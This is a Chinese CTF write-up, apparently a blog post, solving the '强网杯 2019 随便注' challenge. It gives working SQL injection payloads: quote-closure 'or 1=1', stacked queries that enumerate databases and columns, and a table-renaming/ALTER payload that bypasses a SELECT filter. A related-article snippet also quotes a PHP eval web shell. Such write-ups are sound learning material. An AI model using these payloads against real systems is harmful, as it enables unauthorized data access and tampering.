首页 > 其他分享 >[强网杯 2019]随便注 1

[强网杯 2019]随便注 1

时间:2024-11-08 18:42:08浏览次数:1  
标签:tables show 随便 强网杯 flag 2019 words 1919810931114514 TABLE

[强网杯 2019]随便注 1

万能密码上一波,回显成功,判断为 ' 闭合注入

?inject=1' or 1=1 --+

image-20241104231322638

( ?inject=1 union select 1,2,3 )union尝试,根据回显,发现存在字段过滤,过滤了select包括where等操作

/select|update|delete|drop|insert|where|\./i

image-20241104231703485

尝试闭合堆叠

?inject=1';show databases;

image-20241104231930874

堆叠回显成功,并注意到数据库 ctftraining

查询数据表

?inject=1';show databases;use ctftraining;show tables;

image-20241104232148786

查询FLAG_TABLE表字段,显示not_flag,查询news和users皆无果,说明flag不在这个库,转向 supersqli

?inject=1';show databases;use ctftraining;show tables;show columns from FLAG_TABLE;

image-20241104233326834

发现两个库

1';show databases;use supersqli;show tables;

image-20241104235427054

查询1919810931114514库,发现flag,但是未显示flag

1';show databases;use supersqli;show tables;show columns from `1919810931114514`;

image-20241104235604038

这时候需要用到select,但是被过滤了,所以选择用换表的方式,用输入框帮忙查

1';show databases;use supersqli;show tables;show columns from `1919810931114514`;

rename table words to abc;		修改原来的words为任意名
rename `1919810931114514` to words;		将1919810931114514代替成words
ALTER TABLE words ADD id int(10) DEFAULT '12';		往新words添加id字段(因为1919810931114514没有id字段,不添加查询出错)
ALTER TABLE  words CHANGE flag data VARCHAR(100);	
show tables;

构造payload

1';rename table words to abc;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);show tables;


!!!这边数据库语句一定要注意大小写,很邪门,小写报错

成功显示出数据表信息

image-20241105001208184

万能密码伺候

1' or 1=1;

成功拿到flag

image-20241105001258350

标签:tables,show,随便,强网杯,flag,2019,words,1919810931114514,TABLE
From: https://www.cnblogs.com/tazmi/p/18535693

相关文章

  • [极客大挑战 2019]Upload 1
    [极客大挑战2019]Upload1打开实例为文件上传页面,代码审计,发现为php文件,采用php马采用bp抓包修改后缀绕过,上传一句话木马<?phpphpinfo();@eval($_POST['cmd']);?>回显错误,显示不能为php,存在文件类型过滤尝试采用phtm文件包含php绕过显示非image文件尝试采用GIF89......
  • [极客大挑战 2019]Secret File 1
    [极客大挑战2019]SecretFile1代码审计发现页面/Archive_room.php访问页面点击SECRET按钮,bp抓包发现302重定向,附带一个注释页面secr3t.php访问secr3t.php,代码审计访问flag.php,发现一个贱贱的页面,确认是文件包含看不到页面且禁用../等参数,考虑用php的base64回显,paylo......
  • [极客大挑战 2019]PHP 1
    [极客大挑战2019]PHP1打开文件发现提示信息“备份文件”,查看源码并未发现其他有效信息采用dirsearch爆破目录,找到www.zip文件解压zip,发现是源码泄露提交flag,发现不正确,看到index.php源码中有Get传参,然后反序列化函数unserialize(),判断为反序列化漏洞;查看class.php可......
  • [极客大挑战 2019]LoveSQL 1
    [极客大挑战2019]LoveSQL1代码审计,发现表单方式为get提交到check.php万能密码admin'or1=1#登录成功,这边我以为密码就是flag,结果并不是,结合题目信息,猜想这应该是根据账号密码的注入尝试闭合?username=admin'and1=1%23&password=d3c9cf30a12d1f13d4f778859fb16f73正......
  • Microsoft Office 2019 (office全家桶)for Mac/Windows电脑安装包
    MicrosoftOffice2019forMac(Office全家桶)是一款功能全面且强大的办公软件套件,专为Mac用户设计。Mac苹果电脑下载:Office2019(含激活秘钥)Windows电脑下载:Office2019(含批量许可)    以下是其主要特点和优势:一、界面设计采用了Mac系统的设......
  • 重温c语言之,7天开整,就是随便的写写,第八天
    一:函数1、递归题目:求n的阶乘(不考虑溢出)上代码1#include<stdio.h>2intfactorial(intn){3if(n>1){4returnn*(factorial(n-1));5}6else7{8return1;9}10}11#include<stdio.h>12in......
  • 2024年11月随便做做
    十月太摆了没有随便做做环节。测试题目选集20241106-D.盼君勿忘题解等会写qwq。Miscellaneous[AGC022D]Shopping神秘题目,比较酷。首先发现对于\(t_i\ge2L\)的\(t_i\)可以直接将\(t_i\lfloor\frac{t_i}{2L}\rfloor\)加入答案并将\(t_i\)对\(2L\)取模。然后只......
  • 重温c语言之,7天开整,就是随便的写写,第七天
    一:素数又见素数但这次不一样,这次需要用到函数,利用函数来将素数区分出来,直接上代码1#include<stdio.h>2#include<math.h>3intprime_num(intnum)4{5for(inti=2;i<sqrt(num);i++)6{7if(num%i==0)8{9......
  • CF1270 Good Bye 2019
    Dashboard玩构造玩的,服了。A拥有最大牌的必胜。linkB若相邻的差\(\ge2\)则有解,否则根据变化连续性一定无解。linkC加两个数,第一个数为之前所有数的异或和。加进来之后异或为0。第二个数为加完第一个数之后的和。linkD考虑\(k=n-1\)时,分别询问除去每个数之后的第\(......
  • 基于Arcgis10.8+VS2019的ArcObjectsSDKNet安装
    基于Arcgis10.8+VS2019的ArcObjectsSDKNet安装首先Arcgis10.8和Arcgis10.8.1所需要的ArcObjectsSDKNet版本是不同的在使用10.8的ArcObjectsSDKNet在Arcgis10.8.1的基础上是安装不了的,会检测不到在安装Arcgis10.8的基础上,下载Arcgis10.8的ArcObjectsSDKNet,解压后进行安装连接......